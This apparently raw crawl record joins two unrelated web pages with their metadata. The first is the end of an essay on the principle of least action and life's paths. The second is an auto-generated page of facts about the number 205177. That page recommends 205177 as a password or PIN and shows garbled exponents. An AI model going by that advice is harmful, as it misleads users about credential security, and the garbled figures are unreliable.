of a number is always positive, it follows that no matter how small a is, the action above will always be larger than the action that would result had the particle maintained the speed v, throughout time t.\n\nIt might seem like we are supplementing the law with additional information – a knowledge of the initial and final states. But if you think about it, we do the same in classical mechanics also; there too, we need to input two distinct pieces of data to get a sensible result from Newton's equations. Here's how:\n\nNewton's law F = ma says that the magnitude of the force applied on a body has the same numerical value as the product of its mass, and the acceleration it experiences. In other words, given the mass of an object, and the force acting upon it, we can calculate the acceleration. But acceleration just determines the rate at which the velocity changes – it is blind to the actual values of the initial and final velocities.\n\nWhen we are told that an object is accelerating at a rate of 10 m/s2, we can conclude that with every passing second, its velocity changes by 10 m/s, but are unable to make any claims about the numerical value of the final velocity, unless we know how fast the object was moving when the force was first applied. This additional piece of information is known as an initial condition. In fact, if we want to trace the path travelled by an object under the influence of a particular force, we need two pieces of data – in addition to the initial velocity, we must also know the initial position. (The argument is similar to what we have seen above; velocity tells us how fast something moves, and in which direction – it carries no knowledge of the starting position. This information must be put in “by hand.”) So, Newton's laws can be used to determine the unique path travelled by an object, as long as we know where it began its journey from, and how fast it was moving at the time.\n\nAnd so, it happens that the least action principle leads to the same conclusion as Newton's familiar laws of motion. In similar vein, by writing down the appropriate Lagrangians, we can explain a host of phenomena in widely varying physical systems. The refraction of a light ray, when it passes from a rare to a dense medium, can be attributed to the fact that light “wants” to minimize the time it takes in traveling from one point to another. Since it travels more slowly in a denser medium, light will traverse a path that requires it to cross the smallest possible distance here. Physics abounds with such examples; geodesics in general relativity are merely the shortest possible paths objects can travel in a curved space-time; soap bubbles acquire shapes that minimize their surface area; currents in circuits travel the path of least resistance, and so on. The reach of the least action principle is hard to overstate.", null, "This principle is more elegant than – for instance – Newton's laws, but it stands apart in another way also. Newton's laws, and in fact many others, are formulated in terms of differential equations; equations that are concerned with incremental changes. The path of an object is charted out by moving from point to point. At each step, you are concerned only with the next one. Instead of concerning itself with an infinitude of minutiae, the least action principle tackles the overarching problem by considering the path as a whole. It is a difference of attitude, or at the very least, perspective.\n\nComing back now, to us. We know where we started: in a grudging state of admiration for the unfailing instincts that guide inanimate objects along the optimal paths. Can we end up in a state where we have learnt, somehow, to do the same? It would appear not. But at least now we can make sense of the reasons why. For starters, we don't know how to write down the proper Lagrangian. Kinetic energy is puzzling enough, but the invisible potentials in which we find ourselves are often completely unknown, so we don't have an expression for the action. We don't know what it is we need to minimize.\n\nThere is yet another problem: the least action principle connects a fixed beginning to a fixed end. It only works when you know the end and you need to figure out the path taken to get there. In life, we don't really know where we will end up, leave alone when. Optimizing our trajectories might have been possible if we could step outside the bounds of space and time, and see our lives laid out as a whole. Perhaps then, we could stop obsessing about each detail along the path and simply mold the curve into a pleasing overall shape – letting the points fall where they may. But all we have is the here and now, so an incremental approach is the best we can do. And so, we inch forward step by step, focusing on the immediate, trying to make the most of the moment.\n\nMaybe it is just as well. Perhaps for us sentient beings, the goal is not simply to get from Point A to Point B. Our haphazard Brownian motion through life, that causes us to scatter off unexpected obstacles and collide with unforeseen objects, also makes our hearts expand and forces our minds to grow. Perhaps that is the point. Maybe for us, it really is about the journey, and not the destination." ]
[ null, "https://3quarksdaily.com/wp-content/legacy/6a00d8341c562c53ef01b7c6e4bfd4970b-320wi", null, "http://a3.typepad.com/6a019b00fed410970b01bb078991a3970d-250wi", null, "http://a5.typepad.com/6a019b00fed410970b01b7c6e4896d970b-150wi", null, "http://a3.typepad.com/6a019b00fed410970b01bb078991fb970d-450wi", null, "http://a1.typepad.com/6a019b00fed410970b01bb07899239970d-550wi", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9577029,"math_prob":0.97077024,"size":10825,"snap":"2023-40-2023-50","text_gpt3_token_len":2251,"char_repetition_ratio":0.12041401,"word_repetition_ratio":0.010948905,"special_character_ratio":0.20443419,"punctuation_ratio":0.09697256,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97301584,"pos_list":[0,1,2,3,4,5,6,7,8,9,10],"im_url_duplicate_count":[null,3,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-10-04T09:48:09Z\",\"WARC-Record-ID\":\"<urn:uuid:d8b3d039-04f9-4095-8818-f87ebcc24b0d>\",\"Content-Length\":\"57243\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7f5ff092-8454-470b-b72c-97372c6c4303>\",\"WARC-Concurrent-To\":\"<urn:uuid:3c3c1df9-abac-48e4-8a6a-7953543c0d52>\",\"WARC-IP-Address\":\"165.227.96.216\",\"WARC-Target-URI\":\"https://3quarksdaily.com/3quarksdaily/2014/09/on-optimal-paths-minimal-action.html\",\"WARC-Payload-Digest\":\"sha1:3RJHN5EH6WNRGQDLFT7EWIEGUGPEXU6S\",\"WARC-Block-Digest\":\"sha1:Q4IVE2D4N3XK3CRGRNV6OWTYYHS4HHJY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233511364.23_warc_CC-MAIN-20231004084230-20231004114230-00218.warc.gz\"}"}
https://number.academy/205177
[ "# Number 205177\n\nNumber 205,177 spell 🔊, write in words: two hundred and five thousand, one hundred and seventy-seven . Ordinal number 205177th is said 🔊 and write: two hundred and five thousand, one hundred and seventy-seventh. Color #205177. The meaning of number 205177 in Maths: Is Prime? Factorization and prime factors tree. The square root and cube root of 205177. What is 205177 in computer science, numerology, codes and images, writing and naming in other languages. Other interesting facts related to 205177.\n\n## What is 205,177 in other units\n\nThe decimal (Arabic) number 205177 converted to a Roman number is (C)(C)(V)CLXXVII. Roman and decimal number conversions.\n\n#### Weight conversion\n\n205177 kilograms (kg) = 452333.2 pounds (lbs)\n205177 pounds (lbs) = 93067.7 kilograms (kg)\n\n#### Length conversion\n\n205177 kilometers (km) equals to 127492 miles (mi).\n205177 miles (mi) equals to 330201 kilometers (km).\n205177 meters (m) equals to 673145 feet (ft).\n205177 feet (ft) equals 62539 meters (m).\n205177 centimeters (cm) equals to 80778.3 inches (in).\n205177 inches (in) equals to 521149.6 centimeters (cm).\n\n#### Temperature conversion\n\n205177° Fahrenheit (°F) equals to 113969.4° Celsius (°C)\n205177° Celsius (°C) equals to 369350.6° Fahrenheit (°F)\n\n#### Time conversion\n\n(hours, minutes, seconds, days, weeks)\n205177 seconds equals to 2 days, 8 hours, 59 minutes, 37 seconds\n205177 minutes equals to 5 months, 2 days, 11 hours, 37 minutes\n\n### Codes and images of the number 205177\n\nNumber 205177 morse code: ..--- ----- ..... .---- --... --...\nSign language for number 205177:", null, "", null, "", null, "", null, "", null, "", null, "Number 205177 in braille:", null, "QR code Bar code, type 39", null, "", null, "Images of the number Image (1) of the number Image (2) of the number", null, "", null, "More images, other sizes, codes and colors ...\n\n## Share in social networks", null, "## Mathematics of no. 205177\n\n### Multiplications\n\n#### Multiplication table of 205177\n\n205177 multiplied by two equals 410354 (205177 x 2 = 410354).\n205177 multiplied by three equals 615531 (205177 x 3 = 615531).\n205177 multiplied by four equals 820708 (205177 x 4 = 820708).\n205177 multiplied by five equals 1025885 (205177 x 5 = 1025885).\n205177 multiplied by six equals 1231062 (205177 x 6 = 1231062).\n205177 multiplied by seven equals 1436239 (205177 x 7 = 1436239).\n205177 multiplied by eight equals 1641416 (205177 x 8 = 1641416).\n205177 multiplied by nine equals 1846593 (205177 x 9 = 1846593).\nshow multiplications by 6, 7, 8, 9 ...\n\n### Fractions: decimal fraction and common fraction\n\n#### Fraction table of 205177\n\nHalf of 205177 is 102588,5 (205177 / 2 = 102588,5 = 102588 1/2).\nOne third of 205177 is 68392,3333 (205177 / 3 = 68392,3333 = 68392 1/3).\nOne quarter of 205177 is 51294,25 (205177 / 4 = 51294,25 = 51294 1/4).\nOne fifth of 205177 is 41035,4 (205177 / 5 = 41035,4 = 41035 2/5).\nOne sixth of 205177 is 34196,1667 (205177 / 6 = 34196,1667 = 34196 1/6).\nOne seventh of 205177 is 29311 (205177 / 7 = 29311).\nOne eighth of 205177 is 25647,125 (205177 / 8 = 25647,125 = 25647 1/8).\nOne ninth of 205177 is 22797,4444 (205177 / 9 = 22797,4444 = 22797 4/9).\nshow fractions by 6, 7, 8, 9 ...\n\n### Calculator\n\n 205177\n\n#### Is Prime?\n\nThe number 205177 is not a prime number. The closest prime numbers are 205171, 205187.\n\n#### Factorization and factors (dividers)\n\nThe prime factors of 205177 are 7 * 29311\nThe factors of 205177 are 1 , 7 , 29311 , 205177\nTotal factors 4.\nSum of factors 234496 (29319).\n\n#### Powers\n\nThe second power of 2051772 is 42.097.601.329.\nThe third power of 2051773 is 8.637.459.547.880.233.\n\n#### Roots\n\nThe square root √205177 is 452,964679.\nThe cube root of 3205177 is 58,980651.\n\n#### Logarithms\n\nThe natural logarithm of No. ln 205177 = loge 205177 = 12,231628.\nThe logarithm to base 10 of No. log10 205177 = 5,312129.\nThe Napierian logarithm of No. log1/e 205177 = -12,231628.\n\n### Trigonometric functions\n\nThe cosine of 205177 is 0,914629.\nThe sine of 205177 is -0,404293.\nThe tangent of 205177 is -0,44203.\n\n### Properties of the number 205177\n\nIs a Friedman number: No\nIs a Fibonacci number: No\nIs a Bell number: No\nIs a palindromic number: No\nIs a pentagonal number: No\nIs a perfect number: No\n\n## Number 205177 in Computer Science\n\nCode typeCode value\nPIN 205177 It's recommendable to use 205177 as a password or PIN.\n205177 Number of bytes200.4KB\nCSS Color\n#205177 hexadecimal to red, green and blue (RGB) (32, 81, 119)\nUnix timeUnix time 205177 is equal to Saturday Jan. 3, 1970, 8:59:37 a.m. GMT\nIPv4, IPv6Number 205177 internet address in dotted format v4 0.3.33.121, v6 ::3:2179\n205177 Decimal = 110010000101111001 Binary\n205177 Decimal = 101102110011 Ternary\n205177 Decimal = 620571 Octal\n205177 Decimal = 32179 Hexadecimal (0x32179 hex)\n205177 BASE64MjA1MTc3\n205177 MD5793ea1be216767c1460a31e788752f46\n205177 SHA1bed72748c524c035964e33f47a433e164b6874cd\n205177 SHA2244e51f2af7d15f5cb49a8d2dea9459df6a9cafc80a4d0a3637a14e824\nMore SHA codes related to the number 205177 ...\n\nIf you know something interesting about the 205177 number that you did not find on this page, do not hesitate to write us here.\n\n## Numerology 205177\n\n### Character frequency in number 205177\n\nCharacter (importance) frequency for numerology.\n Character: Frequency: 2 1 0 1 5 1 1 1 7 2\n\n### Classical numerology\n\nAccording to classical numerology, to know what each number means, you have to reduce it to a single figure, with the number 205177, the numbers 2+0+5+1+7+7 = 2+2 = 4 are added and the meaning of the number 4 is sought.\n\n## Interesting facts about the number 205177\n\n### Asteroids\n\n• (205177) 2000 CU3 is asteroid number 205177. It was discovered by LINEAR, Lincoln Near-Earth Asteroid Research from Lincoln Laboratory, ETS in Socorro on 2/2/2000.\n\n## № 205,177 in other languages\n\nHow to say or write the number two hundred and five thousand, one hundred and seventy-seven in Spanish, German, French and other languages. The character used as the thousands separator.\n Spanish: 🔊 (número 205.177) doscientos cinco mil ciento setenta y siete German: 🔊 (Anzahl 205.177) zweihundertfünftausendeinhundertsiebenundsiebzig French: 🔊 (nombre 205 177) deux cent cinq mille cent soixante-dix-sept Portuguese: 🔊 (número 205 177) duzentos e cinco mil, cento e setenta e sete Chinese: 🔊 (数 205 177) 二十万五千一百七十七 Arabian: 🔊 (عدد 205,177) مئتان و خمسة ألفاً و مائةسبعة و سبعون Czech: 🔊 (číslo 205 177) dvěstě pět tisíc sto sedmdesát sedm Korean: 🔊 (번호 205,177) 이십만 오천백칠십칠 Danish: 🔊 (nummer 205 177) tohundrede og femtusindethundrede og syvoghalvfjerds Dutch: 🔊 (nummer 205 177) tweehonderdvijfduizendhonderdzevenenzeventig Japanese: 🔊 (数 205,177) 二十万五千百七十七 Indonesian: 🔊 (jumlah 205.177) dua ratus lima ribu seratus tujuh puluh tujuh Italian: 🔊 (numero 205 177) duecentocinquemilacentosettantasette Norwegian: 🔊 (nummer 205 177) to hundre og fem tusen, en hundre og sytti-syv Polish: 🔊 (liczba 205 177) dwieście pięć tysięcy sto siedemdziesiąt siedem Russian: 🔊 (номер 205 177) двести пять тысяч сто семьдесят семь Turkish: 🔊 (numara 205,177) ikiyüzbeşbinyüzyetmişyedi Thai: 🔊 (จำนวน 205 177) สองแสนห้าพันหนึ่งร้อยเจ็ดสิบเจ็ด Ukrainian: 🔊 (номер 205 177) двiстi п'ять тисяч сто сiмдесят сiм Vietnamese: 🔊 (con số 205.177) hai trăm lẻ năm nghìn một trăm bảy mươi bảy Other languages ...\n\n## News to email\n\nPrivacy Policy.\n\n## Comment\n\nIf you know something interesting about the number 205177 or any natural number (positive integer) please write us here or on facebook." ]
[ null, "https://numero.wiki/s/senas/lenguaje-de-senas-numero-2.png", null, "https://numero.wiki/s/senas/lenguaje-de-senas-numero-0.png", null, "https://numero.wiki/s/senas/lenguaje-de-senas-numero-5.png", null, "https://numero.wiki/s/senas/lenguaje-de-senas-numero-1.png", null, "https://numero.wiki/s/senas/lenguaje-de-senas-numero-7.png", null, "https://numero.wiki/s/senas/lenguaje-de-senas-numero-7.png", null, "https://number.academy/img/braille-205177.svg", null, "https://numero.wiki/img/codigo-qr-205177.png", null, "https://numero.wiki/img/codigo-barra-205177.png", null, "https://numero.wiki/img/a-205177.jpg", null, "https://numero.wiki/img/b-205177.jpg", null, "https://numero.wiki/s/share-desktop.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5066518,"math_prob":0.7793294,"size":7270,"snap":"2022-27-2022-33","text_gpt3_token_len":2652,"char_repetition_ratio":0.15785852,"word_repetition_ratio":0.010704728,"special_character_ratio":0.42943603,"punctuation_ratio":0.16080777,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99391574,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,1,null,1,null,1,null,1,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-13T00:29:26Z\",\"WARC-Record-ID\":\"<urn:uuid:80585c06-55f4-4c2d-a1df-ca2bf2746e2d>\",\"Content-Length\":\"41291\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:6b3f53ef-bd91-4cfc-8b38-2ead0b8bbf0e>\",\"WARC-Concurrent-To\":\"<urn:uuid:2febf97b-4c93-40a3-a449-20eba6fc36ff>\",\"WARC-IP-Address\":\"162.0.227.212\",\"WARC-Target-URI\":\"https://number.academy/205177\",\"WARC-Payload-Digest\":\"sha1:ORZ2LE4CHBTCUGFWR7GTD5KMEPEYL3IX\",\"WARC-Block-Digest\":\"sha1:JGFJ6GYOZ4UUUP7GC7T7D75RKSEKKZ57\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882571847.45_warc_CC-MAIN-20220812230927-20220813020927-00466.warc.gz\"}"}